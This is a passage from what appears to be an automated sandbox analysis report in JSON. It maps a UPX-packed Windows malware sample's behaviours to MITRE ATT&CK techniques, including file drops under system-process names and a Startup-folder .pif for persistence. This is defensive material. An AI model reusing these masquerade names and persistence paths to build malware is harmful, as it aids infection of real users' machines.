\"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004340)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005748)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003700)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005652)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005480)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005280)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005284)\n \"4k51k4.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005232)\n \"IExplorer.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00003876)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005284)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"GetWindowTextA\" (UID: 00000000-00005284)\n \"4k51k4.exe\" called \"GetWindowTextA\" (UID: 00000000-00005232)\n \"IExplorer.exe\" called \"GetWindowTextA\" (UID: 00000000-00003876)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1610681416\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1610681416\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1610681416\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1610681416\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1610681416\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"4k51k4.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1610681416\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1610681416\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1610681416\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1610681416\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1610681416\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1610681416\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1275136445\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"CSRSS.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1610681416\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"CSRSS.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1275136445\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"CSRSS.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1610681416\"\n \"cx\": \"32\"\n \"cy\": \"32\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FindFirstFileA\" with parameter C:\\\\msvbvm60.dll (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\*.* (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FindNextFileW\" with parameter 4k51k4.exe (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FindNextFileW\" with parameter addins (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FindNextFileW\" with parameter AppCompat (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FindNextFileW\" with parameter AppPatch (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FindNextFileW\" with parameter assembly (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FindNextFileW\" with parameter bfsvc.exe (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FindNextFileW\" with parameter Boot (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FindNextFileW\" with parameter bootstat.dat (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FindNextFileW\" with parameter Branding (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FindNextFileW\" with parameter CSC (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FindNextFileW\" with parameter Cursors (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FindNextFileW\" with parameter debug (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FindNextFileW\" with parameter diagnostics (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FindNextFileW\" with parameter DigitalLocker (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FindNextFileW\" with parameter Downloaded Program Files (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FindNextFileW\" with parameter ehome (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FindNextFileW\" with parameter en-US (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FindNextFileW\" with parameter explorer.exe (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FindNextFileW\" with parameter Fonts (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FindNextFileW\" with parameter fveupdate.exe (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FindNextFileW\" with parameter Globalization (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"FindNextFileW\" with parameter Help (UID: 00000000-00005284)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"4k51k4.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"IExplorer.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"WINLOGON.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"CSRSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SERVICES.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"LSASS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SMSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"4\"}\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"264\"}\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"352\"}\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"392\"}\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"400\"}\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"456\"}\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"496\"}\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"504\"}\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"512\"}\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"616\"}\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"692\"}\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"780\"}\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"828\"}\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"872\"}\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"900\"}\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1120\"}\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1260\"}\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1304\"}\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1460\"}\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1564\"}\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1628\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" opened \"\\Device\\KsecDD\"\n \"4k51k4.exe\" opened \"\\Device\\KsecDD\"\n \"IExplorer.exe\" opened \"\\Device\\KsecDD\"\n \"WINLOGON.EXE\" opened \"\\Device\\KsecDD\"\n \"CSRSS.EXE\" opened \"\\Device\\KsecDD\"\n \"SERVICES.EXE\" opened \"\\Device\\KsecDD\"\n \"LSASS.EXE\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"4k51k4.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"4k51k4.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1\" has an entrypoint in section \"UPX1\"\n \"services.exe\" has an entrypoint in section \"UPX1\"\n \"shell.exe\" has an entrypoint in section \"UPX1\"\n \"4k51k4.exe\" has an entrypoint in section \"UPX1\"\n \"IExplorer.exe\" has an entrypoint in section \"UPX1\"\n \"New Folder.exe\" has an entrypoint in section \"UPX1\"\n \"Data HAPUBWS.exe\" has an entrypoint in section \"UPX1\"\n \"SERVICES .exe\" has an entrypoint in section \"UPX1\"\n \"Empty.pif\" has an entrypoint in section \"UPX1\"\n \"SERVICES.EXE\" has an entrypoint in section \"UPX1\"\n \"SMSS.EXE\" has an entrypoint in section \"UPX1\"\n \"LSASS.EXE\" has an entrypoint in section \"UPX1\"\n \"4K51K4.EXE.67A9DCB2.bin\" has an entrypoint in section \"UPX1\"\n \"MrHelloween.scr\" has an entrypoint in section \"UPX1\"\n \"IEXPLORER.EXE.67A9C389.bin\" has an entrypoint in section \"UPX1\"\n \"WINLOGON.EXE\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\share\\Data HAPUBWS.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000b80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46931 bytes starting with PE header signature to file \"C:\\Windows\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46861 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46758 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46736 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46922 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46760 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46870 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46795 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46855 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46776 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46774 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46917 bytes starting with PE header signature to file \"C:\\4K51K4\\New Folder.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 47055 bytes starting with PE header signature to file \"C:\\Data %OSUSER%.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46853 bytes starting with PE header signature to file \"C:\\Windows\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46776 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46859 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46858 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46870 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46838 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 46798 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 